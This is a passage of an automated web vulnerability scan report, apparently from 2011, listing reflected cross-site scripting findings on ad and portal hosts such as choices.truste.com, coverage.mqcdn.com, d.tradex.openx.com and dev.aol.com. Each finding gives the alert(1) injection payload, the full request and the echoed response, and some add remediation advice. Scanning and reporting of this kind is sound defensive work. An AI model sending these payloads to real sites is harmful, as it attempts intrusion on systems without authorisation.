Referer: http://view.atdmt.com/CNT/iview/319709115/direct;wi.300;hi.250/01/557142160?click=http://at.atwola.com/adlink/5113/2011664/0/170/AdId=1661022;BnId=2;itime=557142160;kvpg=huffingtonpost;kvugc=0;kvmn=93313563;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:51186:56673:56148:57362:56969:56835:60203:56681:56780:50220:56768:56299:56761:56987:54057;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:20 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4122

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div> \
\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':30094668<script>alert(1)</script>e6e4c609a49,'height':250,'ox':20,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId'
...[SNIP]...

5.69. http://choices.truste.com/ca [zi parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the zi request parameter is copied into the HTML document as plain text between tags. The payload e18f7<script>alert(1)</script>1968cdcc2c0 was submitted in the zi parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=250&ox=20&zi=10002e18f7<script>alert(1)</script>1968cdcc2c0&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709115/direct;wi.300;hi.250/01/557142160?click=http://at.atwola.com/adlink/5113/2011664/0/170/AdId=1661022;BnId=2;itime=557142160;kvpg=huffingtonpost;kvugc=0;kvmn=93313563;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:51186:56673:56148:57362:56969:56835:60203:56681:56780:50220:56768:56299:56761:56987:54057;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:21 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 3980

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
overlay(te_clr1_att02cont1_bi)','icon':'http://choices.truste.com/assets/admarker.png','icon_cam':'http://choices.truste.com/assets/adicon.png','iconText':'','aid':'att02','pid':'mec01','zindex':'10002e18f7<script>alert(1)</script>1968cdcc2c0','cam':'2'};

   var tecabaseurl = 'choices.truste.com';

   truste.ca.addEvent(window, 'load', function() {
       if(!truste.defjsload) {
           var element = document.createElement('script');
           element.src = '
...[SNIP]...

5.70. http://coverage.mqcdn.com/coverage [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://coverage.mqcdn.com
Path:   /coverage

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ed476<script>alert(1)</script>54ce9dc2f2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coverageed476<script>alert(1)</script>54ce9dc2f2f?format=json&jsonp=MQA._covCallback&loc=-96.97,32.64,-96.63,32.93&zoom=11&projection=sm&cat=map%2Chyb%2Csat HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 00:57:11 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/html
Content-Length: 247

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /coverageed476<script>alert(1)</script>54ce9dc2f2f was not found on this server.</p>
...[SNIP]...

5.71. http://coverage.mqcdn.com/coverage [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://coverage.mqcdn.com
Path:   /coverage

Issue detail

The value of the cat request parameter is copied into the HTML document as plain text between tags. The payload a9775<script>alert(1)</script>de994233d1b was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coverage?format=json&jsonp=MQA._covCallback&loc=-96.97,32.64,-96.63,32.93&zoom=11&projection=sm&cat=map%2Chyb%2Csata9775<script>alert(1)</script>de994233d1b HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 BAD REQUEST
Date: Thu, 05 May 2011 00:57:11 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/plain
Content-Length: 46

'sata9775<script>alert(1)</script>de994233d1b'

5.72. http://coverage.mqcdn.com/coverage [jsonp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://coverage.mqcdn.com
Path:   /coverage

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 4ce5e<script>alert(1)</script>96b4cb561f0 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coverage?format=json&jsonp=MQA._covCallback4ce5e<script>alert(1)</script>96b4cb561f0&loc=-96.97,32.64,-96.63,32.93&zoom=11&projection=sm&cat=map%2Chyb%2Csat HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:11 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/javascript
Content-Length: 1138

MQA._covCallback4ce5e<script>alert(1)</script>96b4cb561f0({"map": [{"opt": false, "copyrights": [{"text": "NAVTEQ", "html": "<img align='top' src='http://tile21.mqcdn.com/res/ntcopy_dark.gif' width='45' height='11' class='mqacopyswitch mqacopyswitchdark'>
...[SNIP]...

5.73. http://coverage.mqcdn.com/coverage [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://coverage.mqcdn.com
Path:   /coverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b8261<script>alert(1)</script>64e42659620 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coverage?format=json&jsonp=MQA._covCallback&loc=-96.97,32.64,-96.63,32.93&zoom=11&projection=sm&cat=map%2Chyb%2Csat&b8261<script>alert(1)</script>64e42659620=1 HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:11 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/javascript
Content-Length: 1100

MQA._covCallback({"map": [{"opt": false, "copyrights": [{"text": "NAVTEQ", "html": "<img align='top' src='http://tile21.mqcdn.com/res/ntcopy_dark.gif' width='45' height='11' class='mqacopyswitch mqaco
...[SNIP]...
yrights": [{"text": "i-cubed", "html": null, "group": "Imagery", "id": "i3"}], "id": "i3"}]},"format=json&jsonp=MQA._covCallback&loc=-96.97,32.64,-96.63,32.93&zoom=11&projection=sm&cat=map%2Chyb%2Csat&b8261<script>alert(1)</script>64e42659620=1")

5.74. http://d.tradex.openx.com/afr.php [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The value of the cb request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64156</script><script>alert(1)</script>5e557625608 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=65&zoneid=3606&cb=INSERT_RANDOM_NUMBER_HERE64156</script><script>alert(1)</script>5e557625608 HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=0318609e4899f4eef14c1bdd55dccb7d; expires=Fri, 04-May-2012 00:59:53 GMT; path=/
Content-Length: 3654
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=65&zoneid=3606&cb=INSERT_RANDOM_NUMBER_HERE64156</script><script>alert(1)</script>5e557625608&loc=")', 65000);
// ]]>
...[SNIP]...

5.75. http://d.tradex.openx.com/afr.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a19a0</script><script>alert(1)</script>1f2595708be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=65&zoneid=3606&cb=INSERT_RANDOM_NUMBER_HERE&a19a0</script><script>alert(1)</script>1f2595708be=1 HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=41ceb160f94c774738d19cd8e91c39ef; expires=Fri, 04-May-2012 01:00:00 GMT; path=/
Content-Length: 3660
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=65&zoneid=3606&cb=INSERT_RANDOM_NUMBER_HERE&a19a0</script><script>alert(1)</script>1f2595708be=1&loc=")', 65000);
// ]]>
...[SNIP]...

5.76. http://d.tradex.openx.com/afr.php [zoneid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The value of the zoneid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 767dd</script><script>alert(1)</script>21a4c215031 was submitted in the zoneid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=65&zoneid=3606767dd</script><script>alert(1)</script>21a4c215031&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=f74278266cdb1b8473acb25c7b316621; expires=Fri, 04-May-2012 00:59:42 GMT; path=/
Content-Length: 853
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=65&zoneid=3606767dd</script><script>alert(1)</script>21a4c215031&cb=INSERT_RANDOM_NUMBER_HERE&loc=")', 65000);
// ]]>
...[SNIP]...

5.77. http://dev.aol.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.aol.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44dac"-alert(1)-"5c1e0974f61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?44dac"-alert(1)-"5c1e0974f61=1 HTTP/1.1
Host: dev.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304610976566-Repeat%7C1367682976566%3B%20s_nrgvo%3DRepeat%7C1367682976568%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 11:10:48 GMT
Server: Apache
Set-Cookie: RSP_DAEMON=db7023215051147ee79a8596304debb9; path=/; HttpOnly
Set-Cookie: RSP_DAEMON=a41cc5d6c93fa2f59be7062a842ab853; path=/; HttpOnly
Set-Cookie: SESSad0659a5e17377ebcd7da6b8d8fff621=ba17ae41e03a9b08a1801ca15dd2dc35; path=/; domain=.dev.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 05 May 2011 11:10:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Cteonnt-Length: 16122
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta http-equ
...[SNIP]...
op1=s_265.pfxID + " : " + "devaolcom"
s_265.prop2=s_265.pfxID + " : " + ""
s_265.prop3=""
s_265.prop4=""
s_265.prop6=""
s_265.prop7=""
s_265.prop8=""
s_265.prop10=""
s_265.prop12="http://dev.aol.com/?44dac"-alert(1)-"5c1e0974f61=1"
s_265.linkDownloadFileTypes="gadget,msi"
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_265.t();if(s_code)document.write(s_code);
//]]>
...[SNIP]...

5.78. http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.aol.com
Path:   /themes/zen/dac_2009/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0aa8"-alert(1)-"51d1db99da0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /themesa0aa8"-alert(1)-"51d1db99da0/zen/dac_2009/favicon.ico HTTP/1.1
Host: dev.aol.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; RSP_DAEMON=db7023215051147ee79a8596304debb9; SESSad0659a5e17377ebcd7da6b8d8fff621=25e39137937ec4f94fa1fb6511eab2bf; s_pers=%20s_getnr%3D1304611839510-Repeat%7C1367683839510%3B%20s_nrgvo%3DRepeat%7C1367683839512%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 11:10:55 GMT
Server: Apache
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 05 May 2011 11:10:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
ntCoent-Length: 6548
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 6548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta http-equ
...[SNIP]...
_265.pfxID + " : " + "devaolcom"
s_265.prop2=s_265.pfxID + " : " + ""
s_265.prop3=""
s_265.prop4=""
s_265.prop6=""
s_265.prop7=""
s_265.prop8=""
s_265.prop10=""
s_265.prop12="http://dev.aol.com/themesa0aa8"-alert(1)-"51d1db99da0/zen/dac_2009/favicon.ico"
s_265.linkDownloadFileTypes="gadget,msi"
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_265.t();if(s_code)document.write(s_code);
//]]>
...[SNIP]...

5.79. http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.aol.com
Path:   /themes/zen/dac_2009/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 382d8"-alert(1)-"22026a1b8d3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /themes/zen382d8"-alert(1)-"22026a1b8d3/dac_2009/favicon.ico HTTP/1.1
Host: dev.aol.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; RSP_DAEMON=db7023215051147ee79a8596304debb9; SESSad0659a5e17377ebcd7da6b8d8fff621=25e39137937ec4f94fa1fb6511eab2bf; s_pers=%20s_getnr%3D1304611839510-Repeat%7C1367683839510%3B%20s_nrgvo%3DRepeat%7C1367683839512%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 11:10:57 GMT
Server: Apache
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 05 May 2011 11:10:57 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
ntCoent-Length: 6548
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 6548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta http-equ
...[SNIP]...
.pfxID + " : " + "devaolcom"
s_265.prop2=s_265.pfxID + " : " + ""
s_265.prop3=""
s_265.prop4=""
s_265.prop6=""
s_265.prop7=""
s_265.prop8=""
s_265.prop10=""
s_265.prop12="http://dev.aol.com/themes/zen382d8"-alert(1)-"22026a1b8d3/dac_2009/favicon.ico"
s_265.linkDownloadFileTypes="gadget,msi"
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_265.t();if(s_code)document.write(s_code);
//]]>
...[SNIP]...

5.80. http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.aol.com
Path:   /themes/zen/dac_2009/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e49c1"-alert(1)-"ff73b5a19e7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /themes/zen/dac_2009e49c1"-alert(1)-"ff73b5a19e7/favicon.ico HTTP/1.1
Host: dev.aol.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; RSP_DAEMON=db7023215051147ee79a8596304debb9; SESSad0659a5e17377ebcd7da6b8d8fff621=25e39137937ec4f94fa1fb6511eab2bf; s_pers=%20s_getnr%3D1304611839510-Repeat%7C1367683839510%3B%20s_nrgvo%3DRepeat%7C1367683839512%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 11:10:59 GMT
Server: Apache
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 05 May 2011 11:10:59 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
ntCoent-Length: 6548
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 6548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta http-equ
...[SNIP]...
" : " + "devaolcom"
s_265.prop2=s_265.pfxID + " : " + ""
s_265.prop3=""
s_265.prop4=""
s_265.prop6=""
s_265.prop7=""
s_265.prop8=""
s_265.prop10=""
